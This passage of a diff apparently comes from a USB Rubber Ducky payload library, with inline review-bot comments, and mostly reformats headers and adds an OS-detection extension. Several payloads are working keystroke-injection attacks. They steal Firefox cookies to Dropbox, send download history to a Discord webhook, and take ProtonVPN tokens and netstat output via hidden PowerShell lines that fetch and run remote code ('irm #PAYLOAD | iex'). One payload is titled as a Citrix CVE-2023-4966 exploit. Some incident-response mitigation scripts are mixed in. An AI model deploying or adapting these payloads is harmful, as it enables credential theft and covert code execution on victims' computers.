Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! 
+ END_IF + END_REM +END_EXTENSION -DELAY 1000 GUI r DELAY 500 -STRING powershell -DELAY 500 -ENTER +STRINGLN powershell DELAY 2000 - REM Get cookies DB path STRINGLN $firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles' @@ -33,14 +71,8 @@ STRINGLN $filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite' -END_STRINGLN + $accessToken = #DROPBOX_ACCESS_TOKEN -REM Setting about exfiltration -STRING $accessToken = -STRING DROPBOX_ACCESS_TOKEN -ENTER - -STRINGLN $uploadUrl = "https://content.dropboxapi.com/2/files/upload" $dropboxFilePath = "/cookies_exported.sqlite" diff --git a/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/payload.txt b/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/payload.txt index 0f88392..62b6d05 100644 --- a/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/payload.txt +++ b/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/payload.txt 
@@ -1,26 +1,68 @@ -REM #################################################################### -REM # | -REM # Title : Export all saved certificates with Adobe Reader | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Exfiltration | -REM # Target : Windows 10-11 | -REM # | -REM #################################################################### - +REM_BLOCK +#################################################################### +# # +# Title : Export all saved certificates with Adobe Reader # +# Author : Aleff # +# Version : 1.0 # +# Category : Exfiltration # +# Target : Windows 10-11 # +# # +#################################################################### +END_REM REM Requirements: REM - Adobe Reader must be installed REM - Internet Connection - REM You must define your Dropbox accessToken or modify the exfiltration modality. DEFINE #DROPBOX_ACCESS_TOKEN example +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! 
+ END_IF + END_REM +END_EXTENSION GUI r DELAY 1000 -STRING PowerShell +STRINGLN PowerShell DELAY 2000 REM Settings about Adobe Reader diff --git a/payloads/library/exfiltration/Exports_all_the_links_of_the_downloads/payload.txt b/payloads/library/exfiltration/Exports_all_the_links_of_the_downloads/payload.txt index c8a8bcd..517cd70 100644 --- a/payloads/library/exfiltration/Exports_all_the_links_of_the_downloads/payload.txt +++ b/payloads/library/exfiltration/Exports_all_the_links_of_the_downloads/payload.txt 
@@ -1,20 +1,63 @@ -REM ########################################################### -REM # | -REM # Title : Exports all the links of the downloads | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Exfiltration | -REM # Target : Windows 10/11 | -REM # | -REM ########################################################### - +REM_BLOCK +########################################################### +# # +# Title : Exports all the links of the downloads # +# Author : Aleff # +# Version : 1.0 # +# Category : Exfiltration # +# Target : Windows 10/11 # +# # +########################################################### +END_REM REM Requirements: REM - Firefox installed - REM You must define your Discord webhook if you want to use this method for the exfiltration -DEFINE DISCORD_WEBHOOK example +DEFINE #DISCORD_WEBHOOK example + +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION REM Open Firefox GUI 
@@ -49,9 +92,7 @@ DELAY 10000 STRINGLN " REM Exfiltration using Discord Webhook -STRING $WebhookUrl = " -STRING DISCORD_WEBHOOK -STRINGLN " +STRINGLN $WebhookUrl = "#DISCORD_WEBHOOK" STRINGLN $Payload = @{content = $DOWNLOADS} | ConvertTo-Json diff --git a/payloads/library/exfiltration/ProtonVPN-config/payload.txt b/payloads/library/exfiltration/ProtonVPN-config/payload.txt index 796d694..aa1f6d9 100644 --- a/payloads/library/exfiltration/ProtonVPN-config/payload.txt +++ b/payloads/library/exfiltration/ProtonVPN-config/payload.txt 
@@ -1,43 +1,83 @@ -REM ################################################################### -REM # | -REM # Title : ProtonVPN-config-to-Discord-Exfiltration | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Credentials, Exfiltration | -REM # Target : Windows 10-11 | -REM # | -REM ################################################################### +REM_BLOCK +################################################################### +# # +# Title : ProtonVPN-config-to-Discord-Exfiltration # +# Author : Aleff # +# Version : 1.0 # +# Category : Credentials, Exfiltration # +# Target : Windows 10-11 # +# # +################################################################### -REM Title: ProtonVPN-config-to-Discord-Exfiltration -REM Author: Aleff -REM Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook. -REM In the config file you can find a lot information about the user like: -REM - UserUid -REM - UserAccessToken -REM - UserRefreshToken -REM - UserAuthenticationPublicKey -REM - UserAuthenticationSecretKey -REM - UserAuthenticationCertificatePem -REM - UserCertificationServerPublicKey -REM - and so on... -REM Then it cleans up traces of what you have done after. -REM Target: Windows 10-11 (PowerShell + ProtonVPN software) -REM Version: 1.0 -REM Category: Credentials, Exfiltration -REM Requirements: ProtonVPN user logged at least one time and internet connection -REM +Title: ProtonVPN-config-to-Discord-Exfiltration +Author: Aleff +Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook. + In the config file you can find a lot information about the user like: + - UserUid + - UserAccessToken + - UserRefreshToken + - UserAuthenticationPublicKey + - UserAuthenticationSecretKey + - UserAuthenticationCertificatePem + - UserCertificationServerPublicKey + - and so on... 
+ Then it cleans up traces of what you have done after. +Target: Windows 10-11 (PowerShell + ProtonVPN software) +Version: 1.0 +Category: Credentials, Exfiltration +Requirements: ProtonVPN user logged at least one time and internet connection +END_REM + +REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1 +DEFINE #PAYLOAD example.com REM REQUIRED - Provide your url WEBHOOK - https://discordapp.com/api/webhooks// -DEFINE WEBHOOK example.com +DEFINE #WEBHOOK example.com + +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION -DELAY 2000 GUI r DELAY 250 DELETE -STRING powershell -w h -ep bypass $discord=' -STRING WEBHOOK - -REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1 -DEFINE PAYLOAD example.com -STRING ';irm PAYLOAD | iex -ENTER +STRINGLN powershell -w h -ep bypass $discord='#WEBHOOK';irm #PAYLOAD | iex 
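Review bot: The added comment `REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1` should read "Replace", and the same wording is carried into the Windows-netstat hunk (`REM REQUIRED - Reply example.com with YOUR LINK`). The placeholders are also inconsistent within this file: the comment above `#WEBHOOK` shows the `https://discordapp.com/api/webhooks//` form while the defined value is `example.com`. Proposed wording: `REM REQUIRED - Replace example.com with your link; the payload should be ProtonVPN-config.ps1`.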
diff --git a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md index 955e368..5a813a2 100644 --- a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md +++ b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md @@ -41,18 +41,12 @@ I used the [DETECT_READY](https://shop.hak5.org/blogs/usb-rubber-ducky/detect-re
Github - - - - -
Instagram - -
Discord +
Linkedin - + \ No newline at end of file diff --git a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt index 452d120..0f67474 100644 --- a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt +++ b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt @@ -1,12 +1,14 @@ -REM ########################################################### -REM # | -REM # Title : Tree Structure Of The Operating System | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Exfiltration | -REM # Target : Windows 10-11 | -REM # | -REM ########################################################### +REM_BLOCK +########################################################### +# # +# Title : Tree Structure Of The Operating System # +# Author : Aleff # +# Version : 1.0 # +# Category : Exfiltration # +# Target : Windows 10-11 # +# # +########################################################### +END_REM REM Requirements: REM - Internet connection diff --git a/payloads/library/exfiltration/Windows-netstat/payload.txt b/payloads/library/exfiltration/Windows-netstat/payload.txt index 8728395..c2133e3 100644 --- a/payloads/library/exfiltration/Windows-netstat/payload.txt +++ b/payloads/library/exfiltration/Windows-netstat/payload.txt 
@@ -1,45 +1,84 @@ -REM ################################################################### -REM # | -REM # Title : Windows-netstat-to-Discord-Exfiltration | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Net, Exfiltration | -REM # Target : Windows 10-11 | -REM # | -REM ################################################################### +REM_BLOCK +################################################################### +# # +# Title : Windows-netstat-to-Discord-Exfiltration # +# Author : Aleff # +# Version : 1.0 # +# Category : Net, Exfiltration # +# Target : Windows 10-11 # +# # +################################################################### -REM Title: Windows-netstat-to-Discord-Exfiltration -REM Author: Aleff -REM Description: Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook. -REM Put 1 on the function that you want to active, else 0. Functions available: -REM - default (simple 'netstat' command) -REM - routing_table $r -REM - listening_canonical $lc -REM - listening_numerical $ln -REM - all_canonical $ac -REM - all_numerical $an -REM - offload ot -REM - proto $p "" -REM - - In this option you must put the protocol that you want to monitor, for example $p="TCP" if you want to monitor TCP, else leave blank, so $p="". +Title: Windows-netstat-to-Discord-Exfiltration +Author: Aleff +Description: Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook. +Put 1 on the function that you want to active, else 0. Functions available: +- default (simple 'netstat' command) +- routing_table $r +- listening_canonical $lc +- listening_numerical $ln +- all_canonical $ac +- all_numerical $an +- offload ot +- proto $p "" +- - In this option you must put the protocol that you want to monitor, for example $p="TCP" if you want to monitor TCP, else leave blank, so $p="". 
-REM Target: Windows 10-11 (PowerShell) -REM Version: 1.0 -REM Category: Net, Exfiltration -REM Requirements: Internet connection -REM +Target: Windows 10-11 (PowerShell) +Version: 1.0 +Category: Net, Exfiltration +Requirements: Internet connection +END_REM REM REQUIRED - Provide your Discord WEBHOOK -DEFINE WEBHOOK https://discordapp.com/api/webhooks// +DEFINE #WEBHOOK https://discordapp.com/api/webhooks// + +REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be Windows-netstat.ps1 +DEFINE #PAYLOAD example.com + +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION -DELAY 2000 GUI r DELAY 250 DELETE -STRING powershell -w h -ep bypass $discord=' - -STRING WEBHOOK - -REM REQUIRED - Reply example.com with YOUR LINK. 
The Payload should be Windows-netstat.ps1 -DEFINE PAYLOAD example.com -STRING ';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm PAYLOAD | iex -ENTER +STRINGLN powershell -w h -ep bypass $discord='#WEBHOOK';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm #PAYLOAD | iex diff --git a/payloads/library/incident_response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE-2023-20273/payload.txt b/payloads/library/incident_response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE-2023-20273/payload.txt index 2f38763..e86dc01 100644 --- a/payloads/library/incident_response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE-2023-20273/payload.txt +++ b/payloads/library/incident_response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE-2023-20273/payload.txt @@ -1,13 +1,14 @@ -REM ############################################################################################# -REM # # -REM # Title : Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273 # -REM # Author : Aleff # -REM # Version : 1.0 # -REM # Category : incident-response # -REM # Target : Cisco IOS XE # -REM # # -REM ############################################################################################# - +REM_BLOCK +############################################################################################# +# # +# Title : Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273 # +# Author : Aleff # +# Version : 1.0 # +# Category : incident-response # +# Target : Cisco IOS XE # +# # +############################################################################################# +END_REM REM Set the script name, the default name is auto-check.sh but you can change it here since is used the DuckyScript variable #SCRIPT-NAME. DEFINE #SCRIPT-NAME auto-check.sh 
@@ -75,17 +76,17 @@ STRINGLN done' > #PATH-TO-SCRIPT#SCRIPT-NAME END_STRINGLN - - REM To avoid some bad DELAY I decided to use only one command row -REM Old script -REM STRINGLN sudo chmod +x #SCRIPT-NAME -REM DELAY 500 -REM STRINGLN #SUDO-PSWD -REM DELAY 3000 -REM STRINGLN sh #PATH-TO-SCRIPT#SCRIPT-NAME $ -REM STRINGLN exit +REM_BLOCK +Old script: + STRINGLN sudo chmod +x #SCRIPT-NAME + DELAY 500 + STRINGLN #SUDO-PSWD + DELAY 3000 + STRINGLN sh #PATH-TO-SCRIPT#SCRIPT-NAME $ + STRINGLN exit +END_REM REM Optimized script STRINGLN sudo chmod +x #SCRIPT-NAME; sh #PATH-TO-SCRIPT#SCRIPT-NAME $; exit diff --git a/payloads/library/incident_response/Defend_yourself_against_CVE-2023-36884_Office_and_Windows_HTML_R/payload.txt b/payloads/library/incident_response/Defend_yourself_against_CVE-2023-36884_Office_and_Windows_HTML_R/payload.txt index 9bb09a8..0cb57d1 100644 --- a/payloads/library/incident_response/Defend_yourself_against_CVE-2023-36884_Office_and_Windows_HTML_R/payload.txt +++ b/payloads/library/incident_response/Defend_yourself_against_CVE-2023-36884_Office_and_Windows_HTML_R/payload.txt 
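Review bot: In the retained one-liner of the Cisco IOS XE check, `sudo chmod +x #SCRIPT-NAME` targets the bare script name while `sh` is given the full `#PATH-TO-SCRIPT#SCRIPT-NAME`, so the two only refer to the same file when the terminal's working directory happens to be `#PATH-TO-SCRIPT`. Because the script is passed to `sh` as an argument, the execute bit is not needed at all, and dropping the `sudo chmod` removes the only privileged step visible here (the old sequence kept in the new `REM_BLOCK` typed `#SUDO-PSWD` for it). The commands are joined with `;`, so `exit` closes the terminal whether or not the check ran; joining the last two with `&&` would leave a failure on screen. The script body starts above this hunk, so whether the script itself needs root cannot be told from here.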
@@ -1,34 +1,79 @@ -REM ####################################################################################################################### -REM # | -REM # Title : Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Incident Response | -REM # Target : Windows 10/11 | -REM # | -REM ####################################################################################################################### +REM_BLOCK +####################################################################################################################### +# # +# Title : Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability # +# Author : Aleff # +# Version : 1.0 # +# Category : Incident Response # +# Target : Windows 10/11 # +# # +####################################################################################################################### -REM PlugAndPlay <3 +PlugAndPlay <3 -REM Requirements: -REM - ExecutionPolicy Bypass +Requirements: + - ExecutionPolicy Bypass -REM Impact: Remote Code Execution -REM Max Severity: Important +Impact: Remote Code Execution +Max Severity: Important -REM Mitigation: +Mitigation: -REM - Customers who use Microsoft Defender for Office are protected from attachments that attempt to exploit this vulnerability. + - Customers who use Microsoft Defender for Office are protected from attachments that attempt to exploit this vulnerability. -REM - The registry key FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION is located in the Main folder under the Internet Explorer settings, within the path HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\FeatureControl. This registry key is used to mitigate the vulnerability known as "Office and Windows HTML Remote Code Execution Vulnerability" (CVE-2023-36884). 
+ - The registry key FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION is located in the Main folder under the Internet Explorer settings, within the path HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\FeatureControl. This registry key is used to mitigate the vulnerability known as "Office and Windows HTML Remote Code Execution Vulnerability" (CVE-2023-36884). -REM The CVE-2023-36884 vulnerability allows remote code execution through the processing of HTML files by Office and Windows applications. Creating this registry key and adding specific application values, such as REG_DWORD with data 1, helps block cross-protocol file navigation to mitigate the exploitation of this vulnerability. +The CVE-2023-36884 vulnerability allows remote code execution through the processing of HTML files by Office and Windows applications. Creating this registry key and adding specific application values, such as REG_DWORD with data 1, helps block cross-protocol file navigation to mitigate the exploitation of this vulnerability. -REM It is recommended to implement these protective measures to prevent potential attacks that could exploit the vulnerability and compromise the security of Office and Windows systems. It is important to understand the implications of modifying the registry and carefully evaluate the impact on the regular functionality of the involved applications. +It is recommended to implement these protective measures to prevent potential attacks that could exploit the vulnerability and compromise the security of Office and Windows systems. It is important to understand the implications of modifying the registry and carefully evaluate the impact on the regular functionality of the involved applications. 
-REM Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884 +Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884 +END_REM + + +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION -DELAY 1000 GUI x DELAY 500 STRING a diff --git a/payloads/library/incident_response/Defend_yourself_from_CVE-2023-23397/payload.txt b/payloads/library/incident_response/Defend_yourself_from_CVE-2023-23397/payload.txt index 8e9ae56..7c6ec5a 100644 --- a/payloads/library/incident_response/Defend_yourself_from_CVE-2023-23397/payload.txt +++ b/payloads/library/incident_response/Defend_yourself_from_CVE-2023-23397/payload.txt 
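Review bot: The mitigation text in the new `REM_BLOCK` of the CVE-2023-36884 payload says the key sits "in the Main folder" but then gives the path as `HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\FeatureControl`, without `Main`; the two statements contradict each other, and someone applying the mitigation by hand from this header would create the key in the wrong place. The advisory cited as Source lists it, as far as I recall, under `...\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION`; please confirm against that page and correct the path. It would also help to say that the values to add are the application executable names, each a `REG_DWORD` set to `1`, since "adding specific application values, such as REG_DWORD with data 1" reads as if REG_DWORD were the value name. The registry commands themselves are outside this hunk.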
@@ -1,25 +1,27 @@ -REM ######################################################## -REM # | -REM # Title : Defend Yourself From CVE-2023-23397 | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Incident-Response | -REM # Target : Windows 10/11 | -REM # | -REM ######################################################## +REM_BLOCK +######################################################## +# # +# Title : Defend Yourself From CVE-2023-23397 # +# Author : Aleff # +# Version : 1.0 # +# Category : Incident-Response # +# Target : Windows 10/11 # +# # +######################################################## -REM PlugAndPlay <3 +PlugAndPlay <3 -REM Requirements: -REM - ExecutionPolicy Bypass -REM - PayloadStudio 1.3.1 +Requirements: + - ExecutionPolicy Bypass + - PayloadStudio 1.3.1 -REM Impacted Products: -REM - All supported versions of Microsoft Outlook for Windows are affected. Other versions of Microsoft Outlook such as Android, iOS, Mac, as well as Outlook on the web and other M365 services are not affected. +Impacted Products: + - All supported versions of Microsoft Outlook for Windows are affected. Other versions of Microsoft Outlook such as Android, iOS, Mac, as well as Outlook on the web and other M365 services are not affected. -REM Mitigation: -REM - Block TCP 445/SMB outbound from your network by using a perimeter firewall, a local firewall, and via your VPN settings. This will prevent the sending of NTLM authentication messages to remote file shares. -REM Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397 +Mitigation: + - Block TCP 445/SMB outbound from your network by using a perimeter firewall, a local firewall, and via your VPN settings. This will prevent the sending of NTLM authentication messages to remote file shares. + Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397 +END_REM EXTENSION PASSIVE_WINDOWS_DETECT REM VERSION 1.1 
diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt index 8b2495e..5642176 100644 --- a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt +++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt @@ -1,12 +1,14 @@ -REM ################################################################################ -REM # # -REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 # -REM # Author : Aleff # -REM # Version : 1.0 # -REM # Category : incident-response # -REM # Target : Citrix NetScaler ADV; NetScaler Gateway # -REM # # -REM ################################################################################ +REM_BLOCK +################################################################################ +# # +# Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 # +# Author : Aleff # +# Version : 1.0 # +# Category : incident-response # +# Target : Citrix NetScaler ADV; NetScaler Gateway # +# # +################################################################################ +END_REM REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200) DEFINE #HOSTNAME example diff --git a/payloads/library/prank/Alien Message From Computer/payload.txt b/payloads/library/prank/Alien Message From Computer/payload.txt index ec205f0..5713691 100644 --- a/payloads/library/prank/Alien Message From Computer/payload.txt +++ b/payloads/library/prank/Alien Message From Computer/payload.txt 
@@ -1,39 +1,79 @@ +REM_BLOCK +#################################################### +# # +# Title : Alien Message From Computer # +# Author : Aleff # +# Version : 1.0 # +# Category : Prank # +# Target : Windows 10/11 # +# # +#################################################### -REM #################################################### -REM # | -REM # Title : Alien Message From Computer | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Prank | -REM # Target : Windows 10/11 | -REM # | -REM #################################################### +Plug-And-Play <3 +Requirements: + - Internet Connection + - ExecutionPolicy Bypass + - Python +END_REM -REM Plug-And-Play <3 +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben -REM Requirements: -REM - Internet Connection -REM - ExecutionPolicy Bypass -REM - Python + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! 
